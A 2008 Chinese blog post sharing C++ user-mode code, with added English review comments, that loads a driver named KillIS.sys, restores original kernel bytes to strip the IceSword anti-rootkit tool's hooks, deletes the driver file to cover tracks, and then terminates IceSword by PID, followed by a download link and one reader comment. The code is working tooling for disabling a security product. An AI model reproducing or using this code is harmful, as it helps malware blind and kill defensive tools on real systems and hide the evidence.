api hook 内核模式结束冰刃进程 C++ 代码共享!
2008年10月23日 星期四 下午 04:20

code:

#include "stdafx.h"
#include "NtQuerySystemInformation.h"
#include "Driver.h"
#include "resource.h"
#include "ObjectKill.h"
#include <stdio.h>
#include <conio.h>
#include <windows.h>
#include <winioctl.h>

// IOCTL codes shared with the KillIS.sys driver. All four use FILE_DEVICE_UNKNOWN,
// METHOD_BUFFERED and FILE_ANY_ACCESS, so any handle to the device can issue them;
// the function numbers 0x900/0x905/0x910/0x915 have to match the driver's dispatch
// table (driver source not on this page).
#define IOCTL_GETADDR_CONTROL CTL_CODE(FILE_DEVICE_UNKNOWN,0x900,METHOD_BUFFERED,FILE_ANY_ACCESS)        // driver -> user: kernel address to restore
#define IOCTL_INPUTCODE_CONTROL CTL_CODE(FILE_DEVICE_UNKNOWN,0x905,METHOD_BUFFERED,FILE_ANY_ACCESS)      // user -> driver: bytes to write (triggers the write)
#define IOCTL_INPUTADDR_CONTROL CTL_CODE(FILE_DEVICE_UNKNOWN,0x910,METHOD_BUFFERED,FILE_ANY_ACCESS)      // user -> driver: target kernel address
#define IOCTL_INPUTBYTECOUNT_CONTROL CTL_CODE(FILE_DEVICE_UNKNOWN,0x915,METHOD_BUFFERED,FILE_ANY_ACCESS) // user -> driver: byte count

// Read ByteCount original bytes of the kernel image at NTBeginKrnlAddress (caller frees the result).
PUCHAR GetNTOriCode(ULONG NTBeginKrnlAddress,ULONG ByteCount);
// Push address, count and original bytes to the driver so it restores them in kernel memory.
void PatchHighMemory(LONG NtBeginAddr,LONG KrnlByteCount);

// Handle to the driver's device object; opened in main(), used by PatchHighMemory().
// NOTE(review): global mutable state with no ownership check — nothing verifies it is valid before use.
HANDLE hDevice;

int main(int argc, char* argv[])
{
/*
 * Entry point. Loads the helper driver from a fixed path, asks it for a
 * kernel address, restores ByteCount bytes of kernel code at that address
 * through PatchHighMemory(), unloads and deletes the driver, then terminates
 * the process whose PID is typed in. argc/argv are unused.
 *
 * Written for 32-bit Windows: kernel addresses are carried in ULONG.
 *
 * Review notes (defender's view):
 *  - No return value in this function is checked: LoadDriver(), DeviceIoControl(),
 *    scanf(). If the driver fails to load, the IOCTL and patch steps still run
 *    against whatever hDevice holds.
 *  - Loading a driver from a fixed path and deleting the .sys immediately after
 *    unloading it is, by itself, a strong host-forensics / EDR signal; the
 *    driver-load event and the file-delete event are the durable artifacts.
 */
char DeviceRet[25];
DWORD ReBytes; // byte count returned by DeviceIoControl; written but never read
memset(DeviceRet,0,4); // only the first 4 of 25 bytes are zeroed

ULONG NtAddr;
ULONG ByteCount;
ULONG BeginKrnlAddr;

FreeSYS(); // defined elsewhere (Driver.h / resource.h); presumably drops the embedded driver to disk — confirm
hDevice = LoadDriver("C:\\KillIS.sys"); // file-scope global; result never validated

memset(DeviceRet,0,4);
// Ask the driver for the kernel address to restore. The 4-byte reply is parsed
// as a decimal string below; nothing guarantees a NUL inside those 4 bytes, and
// bytes 4..24 of DeviceRet are uninitialized, so atol() may read past the reply.
DeviceIoControl(hDevice,IOCTL_GETADDR_CONTROL,0,0,DeviceRet,4,&ReBytes,NULL);

NtAddr = atol(DeviceRet);

BeginKrnlAddr = NtAddr; // start address (assigned but never used)
ByteCount =   10;   // number of bytes to restore (hard-coded)


PatchHighMemory(NtAddr,ByteCount);

UnloadDriver(hDevice);

DeleteFile("C:\\KillIS.sys"); // removes the driver file from disk after use

LONG pid;
printf("\n请输入冰刃的PID值:"); // prompt: "enter IceSword's PID"
scanf("%ld",&pid); // return value unchecked: pid stays uninitialized on bad input
ObjectKill(pid); // from ObjectKill.h; terminates the target process — internals not visible here

return 0;
}

void PatchHighMemory(LONG NtBeginAddr,LONG KrnlByteCount)
{
/*
 * Restore KrnlByteCount bytes of kernel code at NtBeginAddr: fetch the
 * original bytes from the on-disk kernel image (GetNTOriCode) and hand
 * address, count and bytes to the driver through three IOCTLs; the driver
 * performs the actual kernel-memory write. Uses the global hDevice opened
 * in main().
 *
 * Review notes:
 *  - All three DeviceIoControl results are ignored; a failed write is silent.
 *  - The IOCTL order (address, count, code) presumably matters to the driver,
 *    which starts the write on the third call — confirm against the driver source.
 *  - Code is malloc'd by GetNTOriCode() and never freed here (leak).
 *  - exit(0) on failure skips UnloadDriver() in main(), leaving the driver loaded.
 *  - Parameters are LONG but sent with sizeof(ULONG); same size on this target, so harmless.
 */
//device var
char DeviceRet[25]; // unused in this function
DWORD ReBytes; // byte count returned by DeviceIoControl; never read
memset(DeviceRet,0,4);

PUCHAR ByteWrite;
PUCHAR Code;

printf("高位内存起始地址:0x%0.8X 数目:0x%0.8X\n",NtBeginAddr,KrnlByteCount); // "high-memory start address ... count"

Code = GetNTOriCode(NtBeginAddr,KrnlByteCount);
if(!Code) exit(0); // address outside the first module: bail out with no cleanup

ByteWrite = Code;   // original code bytes to write back

printf("开始反补丁"); // "starting un-patch"

// send the kernel address to restore
DeviceIoControl(hDevice,IOCTL_INPUTADDR_CONTROL,&NtBeginAddr,sizeof(ULONG),0,0,&ReBytes,NULL);

// send the byte count
DeviceIoControl(hDevice,IOCTL_INPUTBYTECOUNT_CONTROL,&KrnlByteCount,sizeof(ULONG),0,0,&ReBytes,NULL);

// send the bytes themselves; the driver performs the write on this call
DeviceIoControl(hDevice,IOCTL_INPUTCODE_CONTROL,ByteWrite,KrnlByteCount*sizeof(UCHAR),0,0,&ReBytes,NULL);


}


PUCHAR GetNTOriCode(ULONG NTBeginKrnlAddress,ULONG ByteCount)
{
/*
 * Read ByteCount bytes of the kernel image as it exists on disk, at the
 * location corresponding to kernel address NTBeginKrnlAddress. The first
 * entry of the NtQuerySystemInformation module list is taken as the kernel
 * (presumably ntoskrnl — confirm against NtQuerySystemInformation.h); its
 * image file is mapped with LoadLibraryEx(DONT_RESOLVE_DLL_REFERENCES) and
 * the bytes are copied from (mapped base + (address - kernel base)).
 *
 * Returns a malloc'd buffer the caller owns, or 0 when the address lies
 * past the end of the first module.
 *
 * Review notes:
 *  - Success is ULONG, so `Success < 0` can never be true: the NTSTATUS
 *    failure check is dead. If it did fire, pModInfo would be NULL at the
 *    dereference right after it.
 *  - Only the upper bound is checked; neither NTBeginKrnlAddress >= Base nor
 *    NTBeginKrnlAddress + ByteCount <= Base + Size is verified.
 *  - malloc() and LoadLibraryEx() results are unchecked; pModInfo and hKernel
 *    are never released.
 */
HINSTANCE hNTDll;
ULONG nRet;
ULONG nQuerySize;
ULONG Success; // NOTE(review): holds an NTSTATUS; must be signed for the < 0 test below to mean anything
PSYSMODULELIST pModInfo = NULL;

// Resolve NtQuerySystemInformation into the global function pointer from NtQuerySystemInformation.h.
// FreeLibrary right after GetProcAddress relies on ntdll staying mapped for the process lifetime.
hNTDll = LoadLibrary("ntdll");
NtQuerySystemInformation = (NTQUERYSYSTEMINFORMATION)GetProcAddress(hNTDll,"NtQuerySystemInformation");
FreeLibrary(hNTDll);

// Query the loaded kernel-module list: the first call sizes the buffer, the second fills it.
Success = NtQuerySystemInformation(SystemModuleInfo,NULL,0,&nQuerySize);
pModInfo = (PSYSMODULELIST)malloc(nQuerySize); // unchecked allocation
Success = NtQuerySystemInformation(SystemModuleInfo,pModInfo,nQuerySize,&nRet);

if( Success < 0 ) // always false for an unsigned Success; see header note
{
   free( pModInfo );
   pModInfo = NULL; // would be dereferenced on the next line if this branch were reachable
}

// Reject addresses past the end of the first module. No lower-bound check and
// no check that the ByteCount span stays inside the module.
if( NTBeginKrnlAddress >= (ULONG)pModInfo->smi->Size+(ULONG)pModInfo->smi->Base )
   return 0;

HMODULE hKernel;
PUCHAR buf;
buf = (PUCHAR)malloc(ByteCount); // ownership passes to the caller; unchecked
ULONG FileOffset = NTBeginKrnlAddress-(ULONG)(pModInfo->smi->Base); // RVA of the address inside the kernel image
// Map the kernel image file into this process without executing it. ImageName+ModuleNameOffset
// is presumably the bare file name, so this goes through the normal DLL search order rather
// than the exact path of the running kernel — confirm.
hKernel = LoadLibraryEx(pModInfo->smi->ImageName+pModInfo->smi->ModuleNameOffset,0,DONT_RESOLVE_DLL_REFERENCES);

for(int c=0;c<ByteCount;c++) // copy one byte at a time from the mapped image (hKernel unchecked; signed/unsigned compare)
   memcpy(buf+c,(PUCHAR)((ULONG)hKernel+FileOffset+c),sizeof(UCHAR));

return buf; // pModInfo and hKernel are leaked
}

______________________

附件是完整代码

下载地址

内核模式结束冰刃进程.rar


网友评论:
1
2008年10月23日 星期四 下午 10:59 | 回复
这么快就看懂这了,厉害啊